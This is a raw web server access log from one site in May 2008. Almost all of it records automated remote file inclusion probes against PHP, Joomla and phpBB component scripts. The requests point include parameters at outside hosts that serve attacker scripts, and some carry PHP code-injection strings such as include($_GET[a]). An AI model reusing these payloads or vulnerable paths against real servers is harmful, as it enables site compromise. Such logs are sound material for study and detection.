72.29.70.163 - - [05/May/2008:12:35:02 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:35:25 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:35:25 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:35:33 -0700] "GET /logs//citywriter/head.php?path=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:35:33 -0700] "GET //citywriter/head.php?path=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:12:35:58 -0700] "GET /logs/access_080205.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:12:35:58 -0700] "GET /logs/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.220.82 - - [05/May/2008:12:35:59 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.54.9.218 - - [05/May/2008:12:36:00 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [05/May/2008:12:36:00 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.142.220.82 - - [05/May/2008:12:36:01 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.230.5 - - [05/May/2008:12:36:11 -0700] "GET /logs/classified_right.php?language_dir=http://findarticlesabout.com/backup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.230.5 - - [05/May/2008:12:36:11 -0700] "GET /classified_right.php?language_dir=http://findarticlesabout.com/backup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.154.38.121 - - [05/May/2008:12:36:30 -0700] "GET /logs/access_080212.log/avatar.php?page=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [05/May/2008:12:36:30 -0700] "GET /logs/avatar.php?page=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:12:36:46 -0700] "GET /logs/access_080121.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.24.145 - - [05/May/2008:12:36:55 -0700] "GET /logs/classified_right.php?language_dir=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.145 - - [05/May/2008:12:36:56 -0700] "GET /classified_right.php?language_dir=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:37:21 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.242 - - [05/May/2008:12:37:39 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:12:38:03 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:12:38:03 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:12:38:04 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [05/May/2008:12:38:13 -0700] "GET /logs/index.php?go=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [05/May/2008:12:38:19 -0700] "GET /index.php?go=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:12:38:20 -0700] "GET /logs/joomla/index.php?option=com_maxcomment&task=http://ucil.11omb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:12:38:21 -0700] "GET /joomla/index.php?option=com_maxcomment&task=http://ucil.11omb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:12:38:40 -0700] "GET /logs/access_080308.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:12:38:40 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:12:38:47 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:38:50 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:38:50 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:38:50 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.102.61.162 - - [05/May/2008:12:39:01 -0700] "GET /logs/access.log HTTP/1.0" 200 455324 "-" "qwftdytvtoptcmgoos0ink nkLvovco" "www.dmulk.com"
202.51.232.116 - - [05/May/2008:12:39:05 -0700] "GET /logs/access_080315.log//index.php?option=com_maxcomment&task=http://www12.asphost4free.com/redland/id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.51.232.116 - - [05/May/2008:12:39:10 -0700] "GET //index.php?option=com_maxcomment&task=http://www12.asphost4free.com/redland/id/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
202.51.232.116 - - [05/May/2008:12:39:11 -0700] "GET /logs//index.php?option=com_maxcomment&task=http://www12.asphost4free.com/redland/id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:12:39:16 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:12:39:16 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:12:39:17 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:39:27 -0700] "GET /logs/access_080315.log/joomla/index.php?option=com_maxcomment&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:39:28 -0700] "GET /joomla/index.php?option=com_maxcomment&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:39:28 -0700] "GET /logs/joomla/index.php?option=com_maxcomment&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:39:46 -0700] "GET /logs//vwar/admin/admin.php?vwar_root=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:39:46 -0700] "GET //vwar/admin/admin.php?vwar_root=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
65.182.166.93 - - [05/May/2008:12:39:48 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.182.166.93 - - [05/May/2008:12:39:49 -0700] "GET //appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.182.166.93 - - [05/May/2008:12:39:49 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:39:56 -0700] "GET /logs/access_080112.log/joomla/index.php?option=com_maxcomment&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:40:13 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:12:40:15 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.0.64 - - [05/May/2008:12:40:45 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.0.64 - - [05/May/2008:12:40:45 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.0.64 - - [05/May/2008:12:40:46 -0700] "GET //appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.0.64 - - [05/May/2008:12:40:46 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.0.64 - - [05/May/2008:12:40:47 -0700] "GET //appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.0.64 - - [05/May/2008:12:40:47 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:40:48 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:40:48 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:41:09 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:41:20 -0700] "GET /logs/access_080315.log/joomla/index.php?option=com_maxcomment&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:41:20 -0700] "GET /joomla/index.php?option=com_maxcomment&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:41:20 -0700] "GET /logs/joomla/index.php?option=com_maxcomment&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:12:41:28 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.162.210 - - [05/May/2008:12:41:33 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.162.210 - - [05/May/2008:12:41:35 -0700] "GET //appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.162.210 - - [05/May/2008:12:41:37 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:12:41:46 -0700] "GET /logs/access_080311.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:12:41:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:12:41:47 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:12:41:54 -0700] "GET /logs/access_080124.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:12:41:59 -0700] "GET /joomla/index.php?option=com_maxcomment&task=http://ucil.11omb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:12:41:59 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rotary-canelli-nizza.org/r0x.id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:12:42:00 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rotary-canelli-nizza.org/r0x.id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:42:13 -0700] "GET /logs/access_080112.log/joomla/index.php?option=com_maxcomment&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:43:30 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:43:31 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:43:31 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.210.31.3 - - [05/May/2008:12:43:34 -0700] "GET /logs/access_080118.log/index.php?url=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [05/May/2008:12:43:38 -0700] "GET /index.php?url=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [05/May/2008:12:43:39 -0700] "GET /logs/index.php?url=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.51.232.116 - - [05/May/2008:12:43:41 -0700] "GET /logs//index.php?option=com_maxcomment&task=http://www12.asphost4free.com/redland/id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.51.232.116 - - [05/May/2008:12:43:47 -0700] "GET //index.php?option=com_maxcomment&task=http://www12.asphost4free.com/redland/id/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:43:54 -0700] "GET /logs/joomla/index.php?option=com_maxcomment&task=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:43:54 -0700] "GET /joomla/index.php?option=com_maxcomment&task=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:12:44:30 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:12:44:30 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:45:52 -0700] "GET /logs/joomla/index.php?option=com_maxcomment&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [05/May/2008:12:45:53 -0700] "GET /joomla/index.php?option=com_maxcomment&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:12:46:32 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/bdefdp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:12:46:32 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/bdefdp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:12:46:32 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/bdefdp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:12:46:45 -0700] "GET /logs/access_080113.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/bdefdp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:46:57 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:12:46:59 -0700] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/bdefdp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:12:47:00 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/bdefdp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:12:47:00 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/bdefdp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:12:47:01 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rotary-canelli-nizza.org/r0x.id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "dmulk.com"
85.214.33.45 - - [05/May/2008:12:47:01 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rotary-canelli-nizza.org/r0x.id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "dmulk.com"
72.29.70.163 - - [05/May/2008:12:47:01 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:47:01 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:47:02 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:47:11 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:47:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:12:47:18 -0700] "GET /logs/joomla/index.php?option=com_maxcomment&task=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:12:47:18 -0700] "GET /joomla/index.php?option=com_maxcomment&task=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:47:19 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:12:47:29 -0700] "GET /logs//citywriter/head.php?path=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:12:47:30 -0700] "GET //citywriter/head.php?path=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.85.237.38 - - [05/May/2008:12:47:37 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.85.237.38 - - [05/May/2008:12:47:38 -0700] "GET //appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.85.237.38 - - [05/May/2008:12:47:38 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:12:47:47 -0700] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/bdefdp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:12:48:16 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:12:48:16 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
